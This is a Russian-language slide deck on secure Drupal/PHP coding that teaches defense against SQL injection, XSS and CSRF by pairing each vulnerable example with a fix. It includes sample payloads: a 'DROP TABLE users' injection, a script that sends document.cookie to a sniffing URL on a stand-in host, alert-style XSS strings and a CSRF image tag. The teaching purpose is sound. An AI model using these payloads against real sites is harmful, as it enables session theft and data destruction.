1. Безопасный код © Александр Швец [email_address]

2. SQL инъекция $result = db_query(' SELECT * FROM users WHERE id = '" + $userID + "'; ‘ );

3. $userID = "5;DROP TABLE users" ;

4. $result = db_query(' SELECT * FROM users WHERE id = 5; DROP TABLE users; ');

5. Неправильно $result = db_query(' SELECT * FROM users WHERE id = '" + $userID + "'; ‘ );

6. Правильно $result = db_query(' SELECT * FROM users WHERE id = %d ‘ , $userID );

7. Cross-site scripting (XSS) Основная проблема — кража пользовательских cookies, с помощью которых производится неавторизированный вход на сайт.

8. Как крадутся cookie <script> document.write( ‘ <img src=“http://site.com/sniff.php?c=‘ + document.cookie + ’ />’ ); </script>

9. Уязвимость в реальной жизни $output = ‘ <a href=“’. $url .’”>’. $title .’</a>’;

10. $title = “</a> <script>alert(document.cookie)</script><a>” ;

11. <a href=“ …”> </a> <script>alert(document.cookie)</script> <a> </a>

12. $url = “javascript:alert(document.cookie)” ;

13. <a href=“ javascript:alert(document.cookie) ”>… </a>

14. Неправильно $output = ‘ <a href=“’. $url .’”>’. $title .’</a>’;

15. Правильно $output = ‘ <a href=“’. check_url($url) .’”>’. check_plain($title) .’</a>’;

16. Еще лучше $output = l($title, $url) ;

17. Фильтрация ввода — лечение от XSS check_plain() check_markup() ckeck_url() t() filter_xss_admin()

18. Подделка межсайтовых запросов ( CSRF ) <a href=“http://site.com/fast_delete_node”> Быстро удалить документ </a>

19. А что если? <img src=“http://site.com/fast_delete_node”/>

20. Лечение CSRF Управляющий код должен выполняться только в обработчиках форм, либо с проверкой токенов.

21. Спасибо за внимание! Контакты: Александр Швец [email_address] Ссылки: http://drupaldance.com/lessons/secure-code-user-input http://drupaldance.com/lessons/secure-code-database-layer http://drupaldance.com/lessons/secure-code-csrf